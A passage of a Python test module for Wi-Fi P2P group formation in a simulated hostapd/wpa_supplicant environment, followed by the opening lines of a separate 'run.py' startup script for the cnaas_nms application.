i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), pin, i_method, timeout=20, go_intent=i_intent)
logger.debug("i_res: " + str(i_res))
except Exception, e:
i_res = None
logger.info("go_neg_init thread caught an exception from p2p_go_neg_init: " + str(e))
res.put(i_res)
def go_neg_pin(i_dev, r_dev, i_intent=None, r_intent=None, i_method='enter', r_method='display'):
r_dev.p2p_listen()
i_dev.p2p_listen()
pin = r_dev.wps_read_pin()
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.dump_monitor()
res = Queue.Queue()
t = threading.Thread(target=go_neg_init, args=(i_dev, r_dev, pin, i_method, i_intent, res))
t.start()
logger.debug("Wait for GO Negotiation Request on r_dev")
ev = r_dev.wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation timed out")
r_dev.dump_monitor()
logger.debug("Re-initiate GO Negotiation from r_dev")
r_res = r_dev.p2p_go_neg_init(i_dev.p2p_dev_addr(), pin, r_method, go_intent=r_intent, timeout=20)
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
t.join()
i_res = res.get()
if i_res is None:
raise Exception("go_neg_init thread failed")
logger.debug("i_res: " + str(i_res))
logger.info("Group formed")
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
i_dev.dump_monitor()
return [i_res, r_res]
def go_neg_pin_authorized(i_dev, r_dev, i_intent=None, r_intent=None, expect_failure=False, i_go_neg_status=None, i_method='enter', r_method='display', test_data=True, i_freq=None, r_freq=None):
i_dev.p2p_listen()
pin = r_dev.wps_read_pin()
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.p2p_go_neg_auth(i_dev.p2p_dev_addr(), pin, r_method, go_intent=r_intent, freq=r_freq)
r_dev.p2p_listen()
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), pin, i_method, timeout=20, go_intent=i_intent, expect_failure=expect_failure, freq=i_freq)
r_res = r_dev.p2p_go_neg_auth_result(expect_failure=expect_failure)
logger.debug("i_res: " + str(i_res))
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
i_dev.dump_monitor()
if i_go_neg_status:
if i_res['result'] != 'go-neg-failed':
raise Exception("Expected GO Negotiation failure not reported")
if i_res['status'] != i_go_neg_status:
raise Exception("Expected GO Negotiation status not seen")
if expect_failure:
return
logger.info("Group formed")
if test_data:
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
return [i_res, r_res]
def go_neg_init_pbc(i_dev, r_dev, i_intent, res, freq, provdisc):
logger.debug("Initiate GO Negotiation from i_dev")
try:
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), None, "pbc",
timeout=20, go_intent=i_intent, freq=freq,
provdisc=provdisc)
logger.debug("i_res: " + str(i_res))
except Exception, e:
i_res = None
logger.info("go_neg_init_pbc thread caught an exception from p2p_go_neg_init: " + str(e))
res.put(i_res)
def go_neg_pbc(i_dev, r_dev, i_intent=None, r_intent=None, i_freq=None, r_freq=None, provdisc=False, r_listen=False):
if r_listen:
r_dev.p2p_listen()
else:
r_dev.p2p_find(social=True)
i_dev.p2p_find(social=True)
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.dump_monitor()
res = Queue.Queue()
t = threading.Thread(target=go_neg_init_pbc, args=(i_dev, r_dev, i_intent, res, i_freq, provdisc))
t.start()
logger.debug("Wait for GO Negotiation Request on r_dev")
ev = r_dev.wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation timed out")
r_dev.dump_monitor()
logger.debug("Re-initiate GO Negotiation from r_dev")
r_res = r_dev.p2p_go_neg_init(i_dev.p2p_dev_addr(), None, "pbc",
go_intent=r_intent, timeout=20, freq=r_freq)
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
t.join()
i_res = res.get()
if i_res is None:
raise Exception("go_neg_init_pbc thread failed")
logger.debug("i_res: " + str(i_res))
logger.info("Group formed")
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
i_dev.dump_monitor()
return [i_res, r_res]
def remove_group(dev1, dev2):
dev1.remove_group()
try:
dev2.remove_group()
except:
pass
def test_grpform(dev):
"""P2P group formation using PIN and authorized connection (init -> GO)"""
try:
dev[0].request("SET p2p_group_idle 2")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
dev[1].remove_group()
ev = dev[0].wait_global_event(["P2P-GROUP-REMOVED"], timeout=10)
if ev is None:
raise Exception("GO did not remove group on idle timeout")
if "GO reason=IDLE" not in ev:
raise Exception("Unexpected group removal event: " + ev)
finally:
dev[0].request("SET p2p_group_idle 0")
def test_grpform_a(dev):
"""P2P group formation using PIN and authorized connection (init -> GO) (init: group iface)"""
dev[0].request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
if "p2p-wlan" not in i_res['ifname']:
raise Exception("Unexpected group interface name")
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform_b(dev):
"""P2P group formation using PIN and authorized connection (init -> GO) (resp: group iface)"""
dev[1].request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
if "p2p-wlan" not in r_res['ifname']:
raise Exception("Unexpected group interface name")
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform_c(dev):
"""P2P group formation using PIN and authorized connection (init -> GO) (group iface)"""
dev[0].request("SET p2p_no_group_iface 0")
dev[1].request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
if "p2p-wlan" not in i_res['ifname']:
raise Exception("Unexpected group interface name")
if "p2p-wlan" not in r_res['ifname']:
raise Exception("Unexpected group interface name")
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform2(dev):
"""P2P group formation using PIN and authorized connection (resp -> GO)"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=0, r_dev=dev[1], r_intent=15)
remove_group(dev[0], dev[1])
def test_grpform2_c(dev):
"""P2P group formation using PIN and authorized connection (resp -> GO) (group iface)"""
dev[0].request("SET p2p_no_group_iface 0")
dev[1].request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0, r_dev=dev[1], r_intent=15)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform3(dev):
"""P2P group formation using PIN and re-init GO Negotiation"""
go_neg_pin(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
remove_group(dev[0], dev[1])
def test_grpform3_c(dev):
"""P2P group formation using PIN and re-init GO Negotiation (group iface)"""
dev[0].request("SET p2p_no_group_iface 0")
dev[1].request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform_pbc(dev):
"""P2P group formation using PBC and re-init GO Negotiation"""
[i_res, r_res] = go_neg_pbc(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
if i_res['role'] != 'GO' or r_res['role'] != 'client':
raise Exception("Unexpected device roles")
remove_group(dev[0], dev[1])
def test_grpform_pd(dev):
"""P2P group formation with PD-before-GO-Neg workaround"""
[i_res, r_res] = go_neg_pbc(i_dev=dev[0], provdisc=True, r_dev=dev[1], r_listen=True)
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
def test_grpform_ext_listen(dev):
"""P2P group formation with extended listen timing enabled"""
try:
if "OK" not in dev[0].global_request("P2P_EXT_LISTEN 100 50000"):
raise Exception("Failed to set extended listen timing")
if "OK" not in dev[1].global_request("P2P_EXT_LISTEN 200 40000"):
raise Exception("Failed to set extended listen timing")
[i_res, r_res] = go_neg_pbc(i_dev=dev[0], provdisc=True, r_dev=dev[1], r_listen=True)
check_grpform_results(i_res, r_res)
peer1 = dev[0].get_peer(dev[1].p2p_dev_addr())
if peer1['ext_listen_interval'] != "40000":
raise Exception("Extended listen interval not discovered correctly")
if peer1['ext_listen_period'] != "200":
raise Exception("Extended listen period not discovered correctly")
peer0 = dev[1].get_peer(dev[0].p2p_dev_addr())
if peer0['ext_listen_interval'] != "50000":
raise Exception("Extended listen interval not discovered correctly")
if peer0['ext_listen_period'] != "100":
raise Exception("Extended listen period not discovered correctly")
remove_group(dev[0], dev[1])
finally:
if "OK" not in dev[0].global_request("P2P_EXT_LISTEN"):
raise Exception("Failed to clear extended listen timing")
if "OK" not in dev[1].global_request("P2P_EXT_LISTEN"):
raise Exception("Failed to clear extended listen timing")
def test_both_go_intent_15(dev):
"""P2P GO Negotiation with both devices using GO intent 15"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=15, expect_failure=True, i_go_neg_status=9)
def test_both_go_neg_display(dev):
"""P2P GO Negotiation with both devices trying to display PIN"""
go_neg_pin_authorized(i_dev=dev[0], r_dev=dev[1], expect_failure=True, i_go_neg_status=10, i_method='display', r_method='display')
def test_both_go_neg_enter(dev):
"""P2P GO Negotiation with both devices trying to enter PIN"""
go_neg_pin_authorized(i_dev=dev[0], r_dev=dev[1], expect_failure=True, i_go_neg_status=10, i_method='enter', r_method='enter')
def test_go_neg_pbc_vs_pin(dev):
"""P2P GO Negotiation with one device using PBC and the other PIN"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_listen()
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc auth"):
raise Exception("Failed to authorize GO Neg")
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " 12345670 display"):
raise Exception("Failed to initiate GO Neg")
ev = dev[1].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("GO Negotiation failure timed out")
if "status=10" not in ev:
raise Exception("Unexpected failure reason: " + ev)
def test_go_neg_pin_vs_pbc(dev):
"""P2P GO Negotiation with one device using PIN and the other PBC"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_listen()
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " 12345670 display auth"):
raise Exception("Failed to authorize GO Neg")
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " pbc"):
raise Exception("Failed to initiate GO Neg")
ev = dev[1].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("GO Negotiation failure timed out")
if "status=10" not in ev:
raise Exception("Unexpected failure reason: " + ev)
def test_grpform_per_sta_psk(dev):
"""P2P group formation with per-STA PSKs"""
dev[0].request("P2P_SET per_sta_psk 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
pin = dev[2].wps_read_pin()
dev[0].p2p_go_authorize_client(pin)
c_res = dev[2].p2p_connect_group(dev[0].p2p_dev_addr(), pin, timeout=60)
check_grpform_results(i_res, c_res)
if r_res['psk'] == c_res['psk']:
raise Exception("Same PSK assigned for both clients")
hwsim_utils.test_connectivity_p2p(dev[1], dev[2])
dev[0].remove_group()
dev[1].wait_go_ending_session()
dev[2].wait_go_ending_session()
def test_grpform_per_sta_psk_wps(dev):
"""P2P group formation with per-STA PSKs with non-P2P WPS STA"""
dev[0].request("P2P_SET per_sta_psk 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
dev[0].p2p_go_authorize_client_pbc()
dev[2].request("WPS_PBC")
ev = dev[2].wait_event(["CTRL-EVENT-CONNECTED"], timeout=30)
if ev is None:
raise Exception("Association with the GO timed out")
hwsim_utils.test_connectivity_p2p_sta(dev[1], dev[2])
dev[0].remove_group()
dev[2].request("DISCONNECT")
dev[1].wait_go_ending_session()
def test_grpform_force_chan_go(dev):
"""P2P group formation forced channel selection by GO"""
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
i_freq=2432,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2432":
raise Exception("Unexpected channel - did not follow GO's forced channel")
remove_group(dev[0], dev[1])
def test_grpform_force_chan_cli(dev):
"""P2P group formation forced channel selection by client"""
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
i_freq=2417,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2417":
raise Exception("Unexpected channel - did not follow GO's forced channel")
remove_group(dev[0], dev[1])
def test_grpform_force_chan_conflict(dev):
"""P2P group formation fails due to forced channel mismatch"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=0, i_freq=2422,
r_dev=dev[1], r_intent=15, r_freq=2427,
expect_failure=True, i_go_neg_status=7)
def test_grpform_pref_chan_go(dev):
"""P2P group formation preferred channel selection by GO"""
dev[0].request("SET p2p_pref_chan 81:7")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2442":
raise Exception("Unexpected channel - did not follow GO's p2p_pref_chan")
remove_group(dev[0], dev[1])
def test_grpform_pref_chan_go_overridden(dev):
"""P2P group formation preferred channel selection by GO overridden by client"""
dev[1].request("SET p2p_pref_chan 81:7")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
i_freq=2422,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2422":
raise Exception("Unexpected channel - did not follow client's forced channel")
remove_group(dev[0], dev[1])
def test_grpform_no_go_freq_forcing_chan(dev):
"""P2P group formation with no-GO freq forcing channel"""
dev[1].request("SET p2p_no_go_freq 100-200,300,4000-6000")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow no-GO freq")
remove_group(dev[0], dev[1])
def test_grpform_no_go_freq_conflict(dev):
"""P2P group formation fails due to no-GO range forced by client"""
dev[1].request("SET p2p_no_go_freq 2000-3000")
go_neg_pin_authorized(i_dev=dev[0], i_intent=0, i_freq=2422,
r_dev=dev[1], r_intent=15,
expect_failure=True, i_go_neg_status=7)
def test_grpform_no_5ghz_world_roaming(dev):
"""P2P group formation with world roaming regulatory"""
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=14,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli2(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1 (reverse)"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=14,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli3(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1 (intent 15)"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli4(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1 (reverse; intent 15)"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_incorrect_pin(dev):
"""P2P GO Negotiation with incorrect PIN"""
dev[1].p2p_listen()
pin = dev[1].wps_read_pin()
addr1 = dev[1].p2p_dev_addr()
if not dev[0].discover_peer(addr1):
raise Exception("Peer not found")
dev[1].p2p_go_neg_auth(dev[0].p2p_dev_addr(), pin, 'display', go_intent=0)
dev[0].request("P2P_CONNECT " + addr1 + " 00000000 enter go_intent=15")
ev = dev[1].wait_event(["P2P-GROUP-FORMATION-FAILURE"], timeout=10)
if ev is None:
raise Exception("Group formation failure timed out")
ev = dev[0].wait_event(["P2P-GROUP-FORMATION-FAILURE"], timeout=5)
if ev is None:
raise Exception("Group formation failure timed out")
def test_grpform_reject(dev):
"""User rejecting group formation attempt by a P2P peer"""
addr0 = dev[0].p2p_dev_addr()
dev[0].p2p_listen()
dev[1].p2p_go_neg_init(addr0, None, "pbc")
ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation timed out")
if "FAIL" in dev[0].global_request("P2P_REJECT " + ev.split(' ')[1]):
raise Exception("P2P_REJECT failed")
dev[1].request("P2P_STOP_FIND")
dev[1].p2p_go_neg_init(addr0, None, "pbc")
ev = dev[1].wait_global_event(["GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("Rejection not reported")
if "status=11" not in ev:
raise Exception("Unexpected status code in rejection")
def test_grpform_pd_no_probe_resp(dev):
"""GO Negotiation after PD, but no Probe Response"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[0].p2p_listen()
if not dev[1].discover_peer(addr0):
raise Exception("Peer not found")
dev[1].p2p_stop_find()
dev[0].p2p_stop_find()
peer = dev[0].get_peer(addr1)
if peer['listen_freq'] == '0':
raise Exception("Peer listen frequency not learned from Probe Request")
time.sleep(0.3)
dev[0].request("P2P_FLUSH")
dev[0].p2p_listen()
dev[1].global_request("P2P_PROV_DISC " + addr0 + " display")
ev = dev[0].wait_global_event(["P2P-PROV-DISC-SHOW-PIN"], timeout=5)
if ev is None:
raise Exception("PD Request timed out")
ev = dev[1].wait_global_event(["P2P-PROV-DISC-ENTER-PIN"], timeout=5)
if ev is None:
raise Exception("PD Response timed out")
peer = dev[0].get_peer(addr1)
if peer['listen_freq'] != '0':
raise Exception("Peer listen frequency learned unexpectedly from PD Request")
pin = dev[0].wps_read_pin()
if "FAIL" in dev[1].request("P2P_CONNECT " + addr0 + " " + pin + " enter"):
raise Exception("P2P_CONNECT on initiator failed")
ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=5)
if ev is None:
raise Exception("GO Negotiation start timed out")
peer = dev[0].get_peer(addr1)
if peer['listen_freq'] == '0':
raise Exception("Peer listen frequency not learned from PD followed by GO Neg Req")
if "FAIL" in dev[0].request("P2P_CONNECT " + addr1 + " " + pin + " display"):
raise Exception("P2P_CONNECT on responder failed")
ev = dev[0].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out")
ev = dev[1].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out")
def test_go_neg_two_peers(dev):
"""P2P GO Negotiation rejected due to already started negotiation with another peer"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
addr2 = dev[2].p2p_dev_addr()
dev[1].p2p_listen()
dev[2].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
if not dev[0].discover_peer(addr2):
raise Exception("Could not discover peer")
if "OK" not in dev[0].request("P2P_CONNECT " + addr2 + " pbc auth"):
raise Exception("Failed to authorize GO Neg")
dev[0].p2p_listen()
if not dev[2].discover_peer(addr0):
raise Exception("Could not discover peer")
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc"):
raise Exception("Failed to initiate GO Neg")
ev = dev[1].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=5)
if ev is None:
raise Exception("timeout on GO Neg RX event")
dev[2].request("P2P_CONNECT " + addr0 + " pbc")
ev = dev[2].wait_global_event(["GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("Rejection not reported")
if "status=5" not in ev:
raise Exception("Unexpected status code in rejection: " + ev)
def clear_pbc_overlap(dev, ifname):
hapd_global = hostapd.HostapdGlobal()
hapd_global.remove(ifname)
dev[0].p2p_stop_find()
dev[1].p2p_stop_find()
dev[0].dump_monitor()
dev[1].dump_monitor()
time.sleep(0.1)
dev[0].request("BSS_FLUSH 0")
dev[0].request("SCAN freq=2412 only_new=1")
dev[1].request("BSS_FLUSH 0")
dev[1].request("SCAN freq=2412 only_new=1")
time.sleep(1)
def test_grpform_pbc_overlap(dev, apdev):
"""P2P group formation during PBC overlap"""
params = { "ssid": "wps", "eap_server": "1", "wps_state": "1" }
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
hapd.request("WPS_PBC")
time.sleep(0.1)
# Since P2P Client scan case is now optimzied to use a specific SSID, the
# WPS AP will not reply to that and the scan after GO Negotiation can quite
# likely miss the AP due to dwell time being short enoguh to miss the Beacon
# frame. This has made the test case somewhat pointless, but keep it here
# for now with an additional scan to confirm that PBC detection works if
# there is a BSS entry for a overlapping AP.
for i in range(0, 5):
dev[0].scan(freq="2412")
if dev[0].get_bss(apdev[0]['bssid']) is not None:
break
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[0].p2p_listen()
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_listen()
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc auth go_intent=0"):
raise Exception("Failed to authorize GO Neg")
if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " pbc go_intent=15 freq=2412"):
raise Exception("Failed to initiate GO Neg")
ev = dev[0].wait_global_event(["WPS-OVERLAP-DETECTED"], timeout=15)
if ev is None:
raise Exception("PBC overlap not reported")
clear_pbc_overlap(dev, apdev[0]['ifname'])
def test_grpform_pbc_overlap_group_iface(dev, apdev):
"""P2P group formation during PBC overlap using group interfaces"""
# Note: Need to include P2P IE from the AP to get the P2P interface BSS
# update use this information.
params = { "ssid": "wps", "eap_server": "1", "wps_state": "1",
"beacon_int": "15", 'manage_p2p': '1' }
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
hapd.request("WPS_PBC")
dev[0].request("SET p2p_no_group_iface 0")
dev[1].request("SET p2p_no_group_iface 0")
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[0].p2p_listen()
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_stop_find()
dev[0].scan(freq="2412")
dev[0].p2p_listen()
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc auth go_intent=0"):
raise Exception("Failed to authorize GO Neg")
if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " pbc go_intent=15 freq=2412"):
raise Exception("Failed to initiate GO Neg")
ev = dev[0].wait_global_event(["WPS-OVERLAP-DETECTED",
"P2P-GROUP-FORMATION-SUCCESS"], timeout=15)
if ev is None or "WPS-OVERLAP-DETECTED" not in ev:
# Do not report this as failure since the P2P group formation case
# using a separate group interface has limited chances of "seeing" the
# overlapping AP due to a per-SSID scan and no prior scan operations on
# the group interface.
logger.info("PBC overlap not reported")
clear_pbc_overlap(dev, apdev[0]['ifname'])
def test_grpform_goneg_fail_with_group_iface(dev):
"""P2P group formation fails while using group interface"""
dev[0].request("SET p2p_no_group_iface 0")
dev[1].p2p_listen()
peer = dev[1].p2p_dev_addr()
if not dev[0].discover_peer(peer):
raise Exception("Peer " + peer + " not found")
if "OK" not in dev[1].request("P2P_REJECT " + dev[0].p2p_dev_addr()):
raise Exception("P2P_REJECT failed")
if "OK" not in dev[0].request("P2P_CONNECT " + peer + " pbc"):
raise Exception("P2P_CONNECT failed")
ev = dev[0].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("GO Negotiation failure timed out")
def test_grpform_cred_ready_timeout(dev, apdev, params):
"""P2P GO Negotiation wait for credentials to become ready [long]"""
if not params['long']:
logger.info("Skip test case with long duration due to --long not specified")
return "skip"
dev[1].p2p_listen()
addr1 = dev[1].p2p_dev_addr()
if not dev[0].discover_peer(addr1):
raise Exception("Peer " + addr1 + " not found")
start = os.times()[4]
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " 12345670 display"):
raise Exception("Failed to initiate GO Neg")
ev = dev[0].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=200)
if ev is None:
raise Exception("GO Negotiation failure timed out")
end = os.times()[4]
logger.info("GO Negotiation wait time: {} seconds".format(end - start))
if end - start < 120:
raise Exception("Too short GO Negotiation wait time: {}".format(end - start))
def test_grpform_no_wsc_done(dev):
"""P2P group formation with WSC-Done not sent"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
for i in range(0, 2):
dev[0].request("SET ext_eapol_frame_io 1")
dev[1].request("SET ext_eapol_frame_io 1")
dev[0].p2p_listen()
dev[1].p2p_go_neg_auth(addr0, "12345670", "display", 0)
dev[1].p2p_listen()
dev[0].p2p_go_neg_init(addr1, "12345670", "enter", timeout=20,
go_intent=15, wait_group=False)
while True:
ev = dev[0].wait_event(["EAPOL-TX"], timeout=15)
if ev is None:
raise Exception("Timeout on EAPOL-TX from GO")
res = dev[1].request("EAPOL_RX " + addr0 + " " + ev.split(' ')[2])
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[1].wait_event(["EAPOL-TX"], timeout=15)
if ev is None:
raise Exception("Timeout on EAPOL-TX from P2P Client")
msg = ev.split(' ')[2]
if msg[46:56] == "102200010f":
logger.info("Drop WSC_Done")
dev[0].request("SET ext_eapol_frame_io 0")
dev[1].request("SET ext_eapol_frame_io 0")
# Fake EAP-Failure to complete session on the client
id = msg[10:12]
dev[1].request("EAPOL_RX " + addr0 + " 0300000404" + id + "0004")
break
res = dev[0].request("EAPOL_RX " + addr1 + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[0].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out on GO")
ev = dev[1].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out on P2P Client")
dev[0].remove_group()
|
run.py
|
import os
import coverage
import atexit
import signal
import threading
from typing import List
from gevent import monkey, signal as gevent_signal
from redis import StrictRedis
from cnaas_nms.app_settings import api_settings
# Do late imports for anything cnaas/flask related so we can do gevent monkey patch, see below
os.environ['PYTHONPATH'] = os.getcwd()
stop_websocket_threads = False
print("Code coverage collection for worker in pid {}: {}".format(
os.getpid(), ('COVERAGE' in os.environ)))
if 'COVERAGE' in os.environ:
cov = coverage.coverage(
data_file='/coverage/.coverage-{}'.format(os.getpid()),
concurrency="gevent")
cov.start()
def save_coverage():
cov.stop()
cov.save()
atexit.register(save_coverage)
gevent_signal.signal(signal.SIGTERM, save_coverage)
gevent_signal.signal(signal.SIGINT, save_coverage)
def get_app():
from cnaas_nms.scheduler.scheduler import Scheduler
from cnaas_nms.plugins.pluginmanager import PluginManagerHandler
from cnaas_nms.db.session import sqla_session
from cnaas_nms.db.joblock import Joblock
from cnaas_nms.db.job import Job
# If running inside uwsgi, a separate "mule" will run the scheduler
try:
import uwsgi
print("Running inside uwsgi")
